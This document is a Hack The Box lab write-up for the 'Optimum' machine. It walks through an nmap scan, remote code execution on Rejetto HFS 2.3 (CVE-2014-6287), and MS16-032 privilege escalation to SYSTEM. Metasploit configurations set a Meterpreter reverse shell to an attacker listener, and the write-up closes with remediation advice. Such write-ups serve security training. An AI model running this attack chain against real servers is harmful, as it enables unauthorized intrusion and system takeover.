HTB Optimum

HTB Optimum is an easy level Hack the Box challenge.

Summary

Optimum is a networked file server that utilizes a critically vulnerable web application. This vulnerable web application is able to be exploited in order to acheive initial access to the device, after which a high severity vulnerability caused by using outdated operating system components allows for local privilege escalation to the NT AUTHORITY\SYSTEM user.

Service Enumeration

Nmap Scan results


└─$ sudo nmap -sC -sV -T 4 -vvv -Pn 10.129.132.49 

Nmap scan report for 10.129.132.49
Host is up, received user-set (0.049s latency).
Scanned at 2023-08-30 21:37:19 UTC for 18s
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 127 HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
|_http-title: HFS /
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
port protocol version notes
TCP 80 HTTP HttpFileServer httpd 2.3 HFS 2.3 appears to be vulnerable; multiple public exploits for HFS 2.3.x in searchsploit.

Upon perfoming an initial nmap scan, port 80 was discovered to be open on the target host. According to software fingerprinting built into nmap, the software running on this port was HttpFileServer 2.3.

Browsing to port 80 using a conventional browser, it was visually confirmed that the software running on the server was indeed HFS file server v. 2.3

Inspecting the link show, we're directed to the vendor site http://www.rejetto.com/hfs/ (which is out of scope).

Searching Metasploit and Searchsploit for a public exploit for this software, Metasploit's exploit/windows/http/rejetto_hfs_exec was decided upon and successfully tested, resulting in initial access.

Vulnerability Explanation

CVE-2014-6287

Per NIST:

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

Vulnerability Fix

  • Please consider updating Rejetto HFS beyond version 2.3c.
  • Further consider endpoint and network security solutions such as EDR and IDS in order to detect and prevent malicious payloads from executing or crossing the network.

Note: Rejetto HFS 2.3m (the current version) appears to be vulnerable to CVE-2020-13432, which has a CVSS score of 7.5 and could likewise lead to compromise. HFS has not received a major release since 2018, which may indicate that it's development has been halted. It may be worthwhile to consider a different HTTP file server solution, or internally forking HFS and creating in-house patches.

Severity

Per NIST: 9.8 critical.

Proof Of Concept Code

Unmodified public exploit was used. Source can be found here.

Metasploit module config:


Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.129.132.107   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.168     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Proof Screenshot

Proof Text

67b810c17e3f47bc1205e33b637b8aca

Privilege Escalation

Once initial access was established, the meterpreter session was backgrounded and Metasploit's local exploit suggester was used to probe for potential privilege escalation vectors.

The second returned result, windows/local/ms16_032_secondary_logon_handle_privesc was attempted and successfully resulted in local privilege escalation to NT AUTHORITY\SYSTEM.

Vulnerability Explanation

CVE-2016-0099

Per NIST:

The Secondary Logon Service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka "Secondary Logon Elevation of Privilege Vulnerability."

Vulnerability Fix

  • Please consider upgrading to a modern version of Windows. This vulnerability only exists in Vista, 7, and their corresponding server versions.
  • If this is not desirable, please consider applying the security fixes referenced in this article from Microsoft.
  • Please consider deploying host based detection solutions to help detect and prevent the execution of malicious code.

Severity

Per NIST: 7.8 high.

Proof Of Concept Code

Unmodified public exploit used. Source is available here.

Metasploit module configuration:


Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.168     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86

Proof Screenshot

Proof Text

2c0b696ae0dfff6e4211ae07ba9c0358